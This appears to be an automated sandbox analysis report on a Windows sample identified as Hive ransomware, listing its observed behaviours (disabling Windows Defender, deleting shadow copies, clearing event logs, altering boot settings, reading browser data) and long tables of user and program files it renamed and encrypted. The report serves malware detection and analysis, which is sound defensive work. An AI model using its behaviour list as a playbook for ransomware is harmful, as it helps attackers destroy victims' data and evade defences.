Analysis Overview
SHA256
df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687
Threat Level: Known bad
The file df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687 was found to be: Known bad.
Malicious Activity Summary
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
Deletes Windows Defender Definitions
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
Modifies extensions of user files
Reads user/profile data of web browsers
Drops file in Program Files directory
Launches sc.exe
Suspicious use of AdjustPrivilegeToken
Runs net.exe
Suspicious use of WriteProcessMemory
Runs ping.exe
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Interacts with shadow copies
Opens file in notepad (likely ransom note)
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-13 14:02
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-13 14:02
Reported
2022-01-13 14:07
Platform
win7-en-20211208
Max time kernel
117s
Max time network
119s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Modifies extensions of user files
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Users\Admin\Pictures\ConvertUnprotect.tif.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\FormatRemove.raw.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\RevokeResolve.raw.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\WatchCheckpoint.raw => C:\Users\Admin\Pictures\WatchCheckpoint.raw.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\WatchCheckpoint.raw.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\EnableAssert.tiff.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\MountClear.raw => C:\Users\Admin\Pictures\MountClear.raw.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\MountClear.raw.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\OutPublish.crw.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ExportStep.png.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\RevokeResolve.raw => C:\Users\Admin\Pictures\RevokeResolve.raw.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\SyncSave.crw => C:\Users\Admin\Pictures\SyncSave.crw.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\SyncSave.crw.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ConvertUnprotect.tif => C:\Users\Admin\Pictures\ConvertUnprotect.tif.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\EnableAssert.tiff => C:\Users\Admin\Pictures\EnableAssert.tiff.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\EnterRestore.tiff.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ExportStep.png => C:\Users\Admin\Pictures\ExportStep.png.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\EnterRestore.tiff => C:\Users\Admin\Pictures\EnterRestore.tiff.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\FormatRemove.raw => C:\Users\Admin\Pictures\FormatRemove.raw.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\OutPublish.crw => C:\Users\Admin\Pictures\OutPublish.crw.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\EXITEM.CFG.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\203x8subpicture.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Windows Journal\de-DE\jnwmon.dll.mui | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\css\currency.css | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\Vdk10.lng.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\RMNSQUE\PREVIEW.GIF.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387604.JPG.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Waveform.thmx.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEIRM.XML.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WEBCALSO.POC.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\base-undocked-4.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Settings.zip.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\new-trigger-wiz.gif.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\QUAD\PREVIEW.GIF.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE02262_.WMF.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00603_.WMF.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsViewAttachmentIconsMask.bmp.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Media Player\de-DE\WMPMediaSharing.dll.mui | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0238927.WMF.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBBA\MSPUB3A.BDR.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_windy.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro_3.4.200.v20130326-1254.jar.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\es-ES\calendar.html | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14830_.GIF.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\BORDERS\MSART4.BDR.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\reflow.api.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0294991.WMF.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Media Player\de-DE\wmlaunch.exe.mui | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\AXIS\AXIS.INF.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239935.WMF.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\MSOUC_K_COL.HXK.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHLTS.DAT.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\blafdoc.css.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Blanc-Sablon.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Pacific\Efate.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\HEADER.GIF.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\EMAIL.DPV.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\ja-JP\gadget.xml | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad.xml | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-last-quarter.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0153299.WMF.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR20F.GIF.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\VIEW.JS.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\rtstreamsink.ax | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD10358_.GIF.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\ONENOTE_F_COL.HXK.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_left_pressed.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk_1.0.300.v20140407-1803.jar.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Argentina\Buenos_Aires.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18252_.WMF.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.XLS.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\fr-FR\js\picturePuzzle.js | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\db\NOTICE.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_ja_4.4.0.v20140623020002.jar.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD01084_.WMF.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
